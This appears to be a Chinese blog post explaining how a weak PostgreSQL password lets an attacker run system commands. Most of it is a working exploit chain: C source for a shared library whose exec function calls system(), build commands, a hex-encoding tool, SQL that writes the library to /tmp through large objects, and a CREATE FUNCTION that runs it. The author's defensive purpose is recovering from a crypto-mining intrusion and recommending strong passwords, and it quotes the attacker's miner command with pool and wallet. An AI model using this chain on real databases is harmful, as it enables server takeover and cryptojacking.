1.首先通过端口扫描到弱口令 postgresql 账号密码
2.UDF 自定义函数,本地首先编译制作 so 文件,并上传到服务器
参考:https://www.postgresql.org/docs/9.5/static/xfunc-c.html
gcc cmd2.c -I`pg_config --includedir-server` -fPIC -shared -o cmd.so
cmd2.c:
#include "stdlib.h"
#include "postgres.h"
#include <string.h>
#include "utils/geo_decls.h"
#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif
/* by value */
int exec(int arg){
system("ls /root -al> /tmp/result");
return arg;
}
int
add_one(int arg)
{
return arg + 1;
}
/* by reference, fixed length */
float8 *
add_one_float8(float8 *arg)
{
float8 *result = (float8 *) palloc(sizeof(float8));
*result = *arg + 1.0;
return result;
}
Point *
makepoint(Point *pointx, Point *pointy)
{
Point *new_point = (Point *) palloc(sizeof(Point));
new_point->x = pointx->x;
new_point->y = pointy->y;
return new_point;
}
/* by reference, variable length */
text *
copytext(text *t)
{
/*
* VARSIZE is the total size of the struct in bytes.
*/
text *new_t = (text *) palloc(VARSIZE(t));
SET_VARSIZE(new_t, VARSIZE(t));
/*
* VARDATA is a pointer to the data region of the struct.
*/
memcpy((void *) VARDATA(new_t), /* destination */
(void *) VARDATA(t), /* source */
VARSIZE(t) - VARHDRSZ); /* how many bytes */
return new_t;
}
text *
concat_text(text *arg1, text *arg2)
{
int32 new_text_size = VARSIZE(arg1) + VARSIZE(arg2) - VARHDRSZ;
text *new_text = (text *) palloc(new_text_size);
SET_VARSIZE(new_text, new_text_size);
memcpy(VARDATA(new_text), VARDATA(arg1), VARSIZE(arg1) - VARHDRSZ);
memcpy(VARDATA(new_text) + (VARSIZE(arg1) - VARHDRSZ),
VARDATA(arg2), VARSIZE(arg2) - VARHDRSZ);
return new_text;
}
java工具: 将cmd.so 二进制文件做成16进制字符串,每行<=2kB
public static String byteToArray(byte[] data){
String result="";
for (int i = 0; i < data.length; i++) {
result+=Integer.toHexString((data[i] & 0xFF) | 0x100).toUpperCase().substring(1, 3);
if((i+1)%2048==0){
result+="\r\n";
}
}
return result;
}
public static void main(String[] args) throws Exception {
byte[] data=FileUtils.readFileToByteArray(new File("C:\\Users\\martin\\Downloads\\package\\libtest.so"));
String result=byteToArray(data);
System.out.println(result);
}
通过sql命令,将cmd.so 导出到 /tmp 目录下
select lo_creat(-1);
delete from pg_largeobject where loid=390334
select * from pg_largeobject where loid=390334
insert into pg_largeobject (loid,pageno,data) values(390334,0,decode(''FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,1,decode(''FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,2,decode('FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,3,decode(''FFXXXXXXXXXXXXX....','hex'))
;
SELECT lo_export(390334, '/tmp/cmd.so'); //导出 到 /tmp 目录
创建函数:
CREATE or replace FUNCTION exec(integer) RETURNS integer
AS '/tmp/cmd.so', 'exec'
LANGUAGE C STRICT;
执行自定义函数cmd.c的exec方法:
select exec('1')
可以在方法中执行启动进程等,postgres我们公司2台阿里云服务器被人用这种方式 放了挖矿程序导致cpu占用率100%,研究了一天搞清楚了原理,解决方法将postgresql密码修改复杂
附:
黑客启动的挖矿程序执行进程:
/tmp/iftghlv -c x -M
stratum+tcp://49rR8E9A3CZN2jdNpJK4NMLYKCM9TLbSEAB4m9FxLgXZC4pvz6mWfxK6NRHv9Y3C3Xa9nqRLjUUHfU7werrSne1DP3Ufgw2:x@xmr.crypto-pool.fr:3333/xmr
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
